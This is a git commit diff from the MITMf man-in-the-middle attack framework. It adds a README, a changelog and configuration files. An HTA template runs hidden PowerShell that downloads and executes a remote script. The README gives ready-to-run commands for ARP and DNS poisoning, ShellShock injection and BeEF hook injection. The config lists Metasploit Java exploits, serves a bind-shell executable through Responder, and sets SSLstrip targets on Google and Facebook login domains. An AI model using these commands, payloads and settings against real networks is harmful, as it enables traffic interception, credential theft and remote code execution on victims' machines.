byt3bl33d3r
360a6ba6ce addresses issue #63 2015-04-15 17:16:28 +02:00
byt3bl33d3r
3421c5af55 Update requirements.txt with missing dependencie 2015-04-15 16:39:05 +02:00
byt3bl33d3r
be19a685b3 Update README.md 2015-04-15 16:12:08 +02:00
byt3bl33d3r
8eb09309d2 Merged Filepwn plugin and config file changes 2015-04-15 00:40:01 +02:00
byt3bl33d3r
460399541f Modded Responder plugin to accomodate re-write
Started converting all string formatting to format() API
2015-04-13 20:25:14 +02:00
128 changed files with 16026 additions and 9389 deletions

8
.coveragerc Normal file
View file

@ -0,0 +1,8 @@
[run]
branch = True
[report]
include = *core*, *libs*, *plugins*
exclude_lines =
pragma: nocover
pragma: no cover

62
.gitignore vendored
View file

@ -1,3 +1,63 @@
*.pyc
/plugins/old_plugins/
backdoored/
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# OSX Stuff
.DS_Store
._.DS_Store

9
.gitmodules vendored
View file

@ -1,12 +1,3 @@
[submodule "libs/bdfactory"]
path = libs/bdfactory
url = https://github.com/secretsquirrel/the-backdoor-factory
[submodule "libs/responder"]
path = libs/responder
url = https://github.com/byt3bl33d3r/Responder-MITMf
[submodule "core/beefapi"]
path = core/beefapi
url = https://github.com/byt3bl33d3r/beefapi
[submodule "libs/dnschef"]
path = libs/dnschef
url = https://github.com/byt3bl33d3r/dnschef

27
.travis.yml Normal file
View file

@ -0,0 +1,27 @@
language: python
python:
- "2.7"
addons:
apt:
packages:
- libpcap0.8-dev
- libnetfilter-queue-dev
- libssl-dev
notifications:
irc:
channels:
- "irc.freenode.org#MITMf"
template:
- "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
skip_join: true
use_notice: true
install: "pip install -r requirements.txt"
before_script:
- "pip install python-coveralls"
script:
- "nosetests --with-cov"
after_success:
- coveralls

47
CHANGELOG.md Normal file
View file

@ -0,0 +1,47 @@
- Added active filtering/injection into the framework
- Fixed a bug in the DHCP poisoner which prevented it from working on windows OS's
- Made some preformance improvements to the ARP spoofing poisoner
- Refactored Appcachepoison , BrowserSniper plugins
- Refactored proxy plugin API
-Inject plugin now uses BeautifulSoup4 to parse and inject HTML/JS
- Added HTA Drive by plugin
- Added the SMBTrap plugin
- Config file now updates on the fly!
- SessionHijacker is replaced with Ferret-NG captures cookies and starts a proxy that will feed them to connected clients
- JavaPwn plugin replaced with BrowserSniper now supports Java, Flash and browser exploits
- Addition of the Screenshotter plugin, able to render screenshots of a client's browser at regular intervals
- Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library
- Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now a IPv4/IPv6 (TCP & UDP) DNS server! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
- Integrated [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS and act as a rogue WPAD server
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing
- Spoof plugin now supports ICMP, ARP and DHCP spoofing
- Usage of third party tools has been completely removed (e.g. Ettercap)
- FilePwn plugin re-written to backdoor executables zip and tar files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploit's RPC server
- Added [beefapi.py](https://github.com/byt3bl33d3r/beefapi) for interfacing with BeEF's RESTfulAPI
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here: http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)

52
CONTRIBUTING.md Normal file
View file

@ -0,0 +1,52 @@
Contributing
============
Hi! Thanks for taking the time and contributing to MITMf! Pull requests are always welcome!
Submitting Issues/Bug Reporting
=============
Bug reporting is an essential part of any project since it let's people know whats broken!
Before reading on, here's a list of cases where you **shouldn't** be reporting the bug:
- If you haven't installed MITMf using method described in the [installation](https://github.com/byt3bl33d3r/MITMf/wiki/Installation) intructions. (your fault!)
- If you're using and old version of the framework (and by old I mean anything else that **isn't** the current version on Github)
- If you found a bug in a packaged version of MITMf (e.g. Kali Repos), please file a bug report with the distros maintaner
Lately, there has been a sharp **increase** in the volume of bug reports so in order for me to make any sense out of them and to quickly identify, reproduce and push a fix I do pretend a minimal amount of cooperation from the reporter!
Writing the report
==================
**Before submitting a bug familiarize yourself with [Github markdown](https://help.github.com/articles/github-flavored-markdown/) and use it in your report!**
After that, open an issue ticket and please describe the bug in **detail!** MITMf has a lot of moving parts so the more detail the better!
Include in the report:
- The full command string you used
- The full output of: ```pip freeze```
- The full output of MITMf in debug mode (append ```--log debug``` to the command you used)
- The OS you're using (distribution and architecture)
- The full error traceback (If any)
- If the bug resides in the way MITMf sends/receives packets, include a link to a pcap containing a full packet capture
Some good & bad examples
=========================
- How to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/71
https://github.com/byt3bl33d3r/MITMf/issues/70
https://github.com/byt3bl33d3r/MITMf/issues/64
- How not to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/35 <-- My personal favorite
https://github.com/byt3bl33d3r/MITMf/issues/139
https://github.com/byt3bl33d3r/MITMf/issues/138
https://github.com/byt3bl33d3r/MITMf/issues/128
https://github.com/byt3bl33d3r/MITMf/issues/52

22
CONTRIBUTORS.md Normal file
View file

@ -0,0 +1,22 @@
# Intentional contributors (in no particular order)
- @rthijssen
- @ivangr0zni (Twitter)
- @xtr4nge
- @DrDinosaur
- @secretsquirrel
- @binkybear
- @0x27
- @golind
- @mmetince
- @niallmerrigan
- @auraltension
- @HAMIDx9
# Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie
- The Backdoor Factory and BDFProxy
- ARPWatch module from the Subterfuge Framework
- Impacket's KarmaSMB script

195
README.md Normal file → Executable file
View file

@ -1,84 +1,171 @@
MITMf V0.9.6
============
![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)
![Latest Version](https://img.shields.io/badge/mitmf-0.9.8%20--%20The%20Dark%20Side-red.svg)
![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)
[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)
[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
# MITMf
Framework for Man-In-The-Middle attacks
Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
**Before submitting issues please read the appropriate [section](#submitting-issues).**
Contact me at:
- Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf
- Email: byt3bl33d3r@protonmail.com
(Another) Dependency change!
============================
As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required.
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
Installation
============
If MITMf is not in your distros repo or you just want the latest version:
- clone this repository
- run the ```setup.sh``` script
- run the command ```pip install -r requirements.txt``` to install all python dependencies
Availible plugins
=================
- Responder - LLMNR, NBT-NS and MDNS poisoner
- SSLstrip+ - Partially bypass HSTS
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
- Sniffer - Sniffs for various protocol login and auth attempts
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
- AppCachePoison - Perform app cache poison attacks
- SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile
- BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
- CacheKill - Kills page caching by modifying headers
- FilePwn - Backdoor executables being sent over http using bdfactory
- Inject - Inject arbitrary content into HTML content
- JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins
- jskeylogger - Injects a javascript keylogger into clients webpages
- Replace - Replace arbitary content in HTML content
- SMBAuth - Evoke SMB challenge-response auth attempts
- Upsidedownternet - Flips images 180 degrees
Please refer to the wiki for [installation instructions](https://github.com/byt3bl33d3r/MITMf/wiki/Installation)
Changelog
=========
Description
============
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving
existing attacks and techniques.
- Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now a IPv4/IPv6 (TCP & UDP) DNS server ! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely
re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
- Addition of the Sniffer plugin which integrates [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are:
FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos
Features
========
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS, and act as a WPAD rogue server.
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),
allowing users to modify any type of traffic or protocol.
- Addition of the SessionHijacking plugin, which uses code from [FireLamb](https://github.com/sensepost/mana/tree/master/firelamb) to store cookies in a Firefox profile
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing!
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.
- Spoof plugin now supports ICMP, ARP and DHCP spoofing
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
- Usage of third party tools has been completely removed (e.g. ettercap)
Active packet filtering/modification
====================================
- FilePwn plugin re-written to backdoor executables and zip files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploits rpc server
For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
- Added [beefapi.py](https://github.com/byt3bl33d3r/beefapi) for interfacing with BeEF's RESTfulAPI
```python
if packet.haslayer(ICMP):
log.info('Got an ICMP packet!')
packet.dst = '192.168.1.0'
```
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)
- Use the ```packet``` variable to access the packet in a Scapy compatible format
- Use the ```data``` variable to access the raw packet data
Submitting Issues
=================
If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com
Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```
If you find a *bug* please open an issue and include at least the following in the description:
You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)
- Full command string you used
- OS your using
**Note**: you can modify filters on-the-fly without restarting MITMf!
Also remember: Github markdown is your friend!
Examples
========
How to install on Kali
======================
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
```python mitmf.py -i enp3s0```
ARP poison the whole subnet with the gateway at 192.168.1.1 using the **Spoof** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1```
Same as above + a WPAD rogue proxy server using the **Responder** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad```
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1```
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
Enable LLMNR/NBTNS/MDNS spoofing:
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dhcp```
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
Inject an HTML IFrame using the **Inject** plugin:
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
Start a captive portal that redirects everything to http://SERVER/PATH:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
Same as above but with hostname:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help```
# Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
- **ScreenShotter** : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
- **Responder** : LLMNR, NBT-NS, WPAD and MDNS poisoner
- **SSLstrip+** : Partially bypass HSTS
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
- **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
- **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees
- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
# How to fund my tea & sushi reserve
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr
```apt-get install mitmf```

View file

@ -34,5 +34,5 @@
</div>
<div style="padding: 1em;border:1px solid red;margin:1em">
<h1>AppCache Poison works!</h1>
<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
<p>This page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
</div>

View file

@ -1,2 +1,2 @@
;console.log('AppCache Poison was here. Google Analytics FTW');
;alert('AppCache Poison was here. Google Analytics FTW');

31
config/captive/portal.html Executable file
View file

@ -0,0 +1,31 @@
<html>
<head>
<title>Captive Portal</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>Client Required</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="CaptiveClient.exe"><b>Captive Portal Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Captive Server</b></div>
</center>
</body>
</html>

View file

@ -0,0 +1,4 @@
<script>
var c = "powershell.exe -w hidden -nop -ep bypass -c \"\"IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:3000/ps/ps.png')); Invoke-ps\"\"";
new ActiveXObject('WScript.Shell').Run(c);
</script>

475
config/mitmf.conf Normal file → Executable file
View file

@ -1,46 +1,44 @@
#
#MITMf configuration file
# MITMf configuration file
#
[MITMf]
#
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run `python mitmf.py`
#(assuming you config file is in the default directory)
#
args=''
#Required BeEF and Metasploit options
# Required BeEF and Metasploit options
[[BeEF]]
beefip = 127.0.0.1
beefport = 3000
host = 127.0.0.1
port = 3000
user = beef
pass = beef
[[Metasploit]]
msfport = 8080 #Port to start webserver for exploits
rpcip = 127.0.0.1
rpcport = 55552
rpcpass = abc123
[[MITMf-API]]
host = 127.0.0.1
port = 9999
[[DNS]]
#
#Here you can configure MITMf's internal DNS server
# Here you can configure MITMf's internal DNS server
#
resolver = dnschef #Can be set to 'twisted' or 'dnschef' ('dnschef' is highly reccomended)
tcp = Off #Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 #Port to listen on
ipv6 = Off #Run in IPv6 mode (not fully tested, might break stuff!)
tcp = Off # Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 # Port to listen on
ipv6 = Off # Run in IPv6 mode (not fully tested, might break stuff!)
#
#Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
#can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
# Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
# can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
#
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.0.2.1
*.thesprawl.org=192.168.178.27
*.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
@ -76,105 +74,110 @@
*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=
#
#Plugin configuration starts here
# Plugin configuration starts here
#
[Captive]
[Spoof]
# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
Port = 8080
ServerString = "Captive Server 1.0"
[[DHCP]]
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional
# Set the filename served as /CaptivePortal.exe by integrated http server
PayloadFilename = config/captive/calc.exe
[Replace]
[[Regex1]]
'Google Search' = '44CON'
[[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
[Ferret-NG]
#
# Here you can specify the client to hijack sessions from
#
Client = '10.0.237.91'
[SSLstrip+]
#
#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
#
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
[Responder]
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
##Listen on 25/TCP, 587/TCP
SMTP = On
IMAP = On
HTTP = On
#Servers to start
SQL = On
HTTPS = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
LDAP = On
#Set a custom challenge
#Custom challenge
Challenge = 1122334455667788
#Set this to change the default logging file
SessionLog = Responder-Session.log
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#Specific IP Addresses to respond to (default = All)
#Example: RespondTo = 10.20.1.100-150, 10.20.3.10
RespondTo =
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
#RespondTo = WPAD,DEV,PROD,SQLINT
#Specific NBT-NS/LLMNR names to respond to (default = All)
#Example: RespondTo = WPAD, DEV, PROD, SQLINT
RespondToName =
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#Specific IP Addresses not to respond to (default = None)
#Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo =
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
#Specific NBT-NS/LLMNR names not to respond to (default = None)
#Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
[[HTTP Server]]
#Set this to On if you want to always serve a specific file to the victim.
#Set to On to always serve the custom EXE
Serve-Always = Off
#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
#Set to On to replace any requested .exe with the custom EXE
Serve-Exe = On
#Uncomment and specify a custom file to serve, the file must exist.
Filename = config/responder/Denied.html
#Set to On to serve the custom HTML if the URL does not contain .exe
Serve-Html = Off
#Specify a custom executable file to serve, the file must exist.
ExecFilename = config/responder/FixInternet.exe
#Custom HTML to serve
HtmlFilename = config/responder/AccessDenied.html
#Set your custom PAC script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
#Custom EXE File to serve
ExeFilename = config/responder/BindShell.exe
#Name of the downloaded .exe that the client will see
ExeDownloadName = ProxyClient.exe
#Custom WPAD Script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}'
#HTML answer to inject in HTTP responses (before </body> tag).
#Set to an empty string to disable.
#In this example, we redirect make users' browsers issue a request to our rogue SMB server.
HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
[[HTTPS Server]]
#Change to use your certs
cert = config/responder/certs/responder.crt
key = config/responder/certs/responder.key
[BeEFAutorun]
#Example config for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[[ALL]] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[[targets]] #Runs specified modules based on OS and Browser type
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
[[[[FF]]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[[IE]]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[[Windows 7]]] #Target only Windows 7 using Chrome
[[[[C]]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
[[[Linux]]] #Target Linux platforms using Chrome
[[[[C]]]]
'Redirect Browser (Rickroll)' = '{}'
#Configure SSL Certificates to use
SSLCert = config/responder/responder.crt
SSLKey = config/responder/responder.key
[AppCachePoison]
# HTML5 AppCache poisioning attack
@ -204,18 +207,9 @@
templates=test # which templates to use for spoofing content?
skip_in_mass_poison=1
[[gmail]]
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
tamper_url=http://mail.google.com/mail/
# manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default # could be omitted
[[google]]
tamper_url = http://www.google.com/
tamper_url_match = http://www.google.com\.*.
tamper_url = http://www.google.com
manifest_url = http://www.google.com/robots.txt
[[facebook]]
@ -225,7 +219,7 @@
[[twitter]]
tamper_url=http://twitter.com/
#tamper_url_match=^http://(www\.)?twitter\.com/$
tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[[html5rocks]]
@ -243,88 +237,167 @@
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
[JavaPwn]
[BrowserSniper]
#
# Currently only supports java, flash and browser exploits
#
# The version strings were pulled from http://www.cvedetails.com
#
# When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
#
#
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
#
msfport = 8080 # Port to start Metasploit's webserver which will host the exploits
[[Multi]] #Cross platform exploits, yay java! <3
[[exploits]]
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
multi/browser/java_jre17_exec = 1.7.0.6
multi/browser/java_jre17_jaxws = 1.7.0.7
multi/browser/java_jre17_jmxbean = 1.7.0.10
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
multi/browser/java_jre17_reflection_types = 1.7.0.17
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
multi/browser/java_jre17_method_handle = 1.7.0.7
multi/browser/java_jre17_driver_manager = 1.7.0.17
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
multi/browser/java_storeimagearray = 1.7.0.21
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
[[[multi/browser/java_rhino]]] #Exploit's MSF path
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
[[Windows]] #These are windows specific
Browser = Any #Can be set to Any, Chrome, Firefox, MSIE or browser + version (e.g IE 6)
Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
windows/browser/java_mixer_sequencer = 1.6.0.18
#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
